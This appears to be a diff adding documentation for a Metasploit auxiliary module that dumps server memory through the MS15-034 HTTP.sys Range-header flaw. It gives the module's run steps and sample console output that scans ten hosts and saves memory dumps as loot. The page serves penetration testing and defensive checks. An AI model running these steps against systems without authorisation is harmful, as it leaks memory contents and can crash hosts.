|
| 1 | +##Description |
| 2 | + |
| 3 | +This module dumps memory contents using a crafted Range header and affects only Windows 8.1, Server 2012, and Server 2012R2. Note that if the target is running in VMware Workstation, this module has a high likelihood of resulting in BSOD; however, VMware ESX and non-virtualized hosts seem stable. Using a larger target file should result in more memory being dumped, and SSL seems to produce more data as well. |
| 4 | + |
| 5 | +## Verification Steps |
| 6 | + |
| 7 | +1. Do: ```use auxiliary/scanner/http/ms15_034_http_sys_memory_dump``` |
| 8 | +2. Do: ```set RHOSTS [IP]``` |
| 9 | +3. Do: ```set RPORT [PORT]``` |
| 10 | +4. Do: ```run``` |
| 11 | + |
| 12 | +## Sample Output |
| 13 | +``` |
| 14 | +msf > use auxiliary/scanner/http/ms15_034_http_sys_memory_dump |
| 15 | +msf auxiliary(ms15_034_http_sys_memory_dump) > set RHOSTS 10.10.141.11-20 |
| 16 | +RHOSTS => 10.10.141.11-20 |
| 17 | +msf auxiliary(ms15_034_http_sys_memory_dump) > set RPORT 80 |
| 18 | +RPORT => 80 |
| 19 | +msf auxiliary(ms15_034_http_sys_memory_dump) > show options |
| 20 | +
|
| 21 | +Module options (auxiliary/scanner/http/ms15_034_http_sys_memory_dump): |
| 22 | +
|
| 23 | + Name Current Setting Required Description |
| 24 | + ---- --------------- -------- ----------- |
| 25 | + Proxies no A proxy chain of format type:host:port[,type:host:port][...] |
| 26 | + RHOSTS 10.10.141.11-20 yes The target address range or CIDR identifier |
| 27 | + RPORT 80 yes The target port |
| 28 | + SSL false no Negotiate SSL/TLS for outgoing connections |
| 29 | + SUPPRESS_REQUEST true yes Suppress output of the requested resource |
| 30 | + TARGETURI / no URI to the site (e.g /site/) or a valid file resource (e.g /welcome.png) |
| 31 | + THREADS 1 yes The number of concurrent threads |
| 32 | +
|
| 33 | +msf auxiliary(ms15_034_http_sys_memory_dump) > exploit |
| 34 | +
|
| 35 | +[+] Target may be vulnerable... |
| 36 | +[+] Stand by... |
| 37 | +
|
| 38 | +[+] Memory contents: |
| 39 | +
|
| 40 | +
|
| 41 | +[*] Memory dump saved to /root/.msf4/loot/20170320143459_default_10.10.141.11_iis.ms15034_241505.bin |
| 42 | +[*] Scanned 1 of 10 hosts (10% complete) |
| 43 | +[+] Target may be vulnerable... |
| 44 | +[+] Stand by... |
| 45 | +
|
| 46 | +[+] Memory contents: |
| 47 | +
|
| 48 | +
|
| 49 | +[*] Memory dump saved to /root/.msf4/loot/20170320143459_default_10.10.141.12_iis.ms15034_783265.bin |
| 50 | +[*] Scanned 2 of 10 hosts (20% complete) |
| 51 | +[+] Target may be vulnerable... |
| 52 | +[+] Stand by... |
| 53 | +
|
| 54 | +[+] Memory contents: |
| 55 | +
|
| 56 | +
|
| 57 | +[*] Memory dump saved to /root/.msf4/loot/20170320143459_default_10.10.141.13_iis.ms15034_433508.bin |
| 58 | +[*] Scanned 3 of 10 hosts (30% complete) |
| 59 | +[+] Target may be vulnerable... |
| 60 | +[+] Stand by... |
| 61 | +
|
| 62 | +[+] Memory contents: |
| 63 | +
|
| 64 | +
|
| 65 | +[*] Memory dump saved to /root/.msf4/loot/20170320143500_default_10.10.141.14_iis.ms15034_663607.bin |
| 66 | +[*] Scanned 4 of 10 hosts (40% complete) |
| 67 | +[+] Target may be vulnerable... |
| 68 | +[+] Stand by... |
| 69 | +
|
| 70 | +[+] Memory contents: |
| 71 | +
|
| 72 | +
|
| 73 | +[*] Memory dump saved to /root/.msf4/loot/20170320143500_default_10.10.141.15_iis.ms15034_695505.bin |
| 74 | +[*] Scanned 5 of 10 hosts (50% complete) |
| 75 | +[+] Target may be vulnerable... |
| 76 | +[+] Stand by... |
| 77 | +
|
| 78 | +[+] Memory contents: |
| 79 | +
|
| 80 | +
|
| 81 | +[*] Memory dump saved to /root/.msf4/loot/20170320143501_default_10.10.141.16_iis.ms15034_254486.bin |
| 82 | +[*] Scanned 6 of 10 hosts (60% complete) |
| 83 | +[+] Target may be vulnerable... |
| 84 | +[+] Stand by... |
| 85 | +
|
| 86 | +[+] Memory contents: |
| 87 | +
|
| 88 | +
|
| 89 | +[*] Memory dump saved to /root/.msf4/loot/20170320143502_default_10.10.141.17_iis.ms15034_393454.bin |
| 90 | +[*] Scanned 7 of 10 hosts (70% complete) |
| 91 | +[+] Target may be vulnerable... |
| 92 | +[+] Stand by... |
| 93 | +
|
| 94 | +[+] Memory contents: |
| 95 | +
|
| 96 | +
|
| 97 | +[*] Memory dump saved to /root/.msf4/loot/20170320143502_default_10.10.141.18_iis.ms15034_330159.bin |
| 98 | +[*] Scanned 8 of 10 hosts (80% complete) |
| 99 | +[+] Target may be vulnerable... |
| 100 | +[+] Stand by... |
| 101 | +
|
| 102 | +[+] Memory contents: |
| 103 | +
|
| 104 | +
|
| 105 | +[*] Memory dump saved to /root/.msf4/loot/20170320143503_default_10.10.141.19_iis.ms15034_165710.bin |
| 106 | +[*] Scanned 9 of 10 hosts (90% complete) |
| 107 | +[+] Target may be vulnerable... |
| 108 | +[+] Stand by... |
| 109 | +
|
| 110 | +[+] Memory contents: |
| 111 | +
|
| 112 | +
|
| 113 | +[*] Memory dump saved to /root/.msf4/loot/20170320143504_default_10.10.141.20_iis.ms15034_980170.bin |
| 114 | +[*] Scanned 10 of 10 hosts (100% complete) |
| 115 | +[*] Auxiliary module execution completed |
| 116 | +msf auxiliary(ms15_034_http_sys_memory_dump) > |
| 117 | +``` |
0 commit comments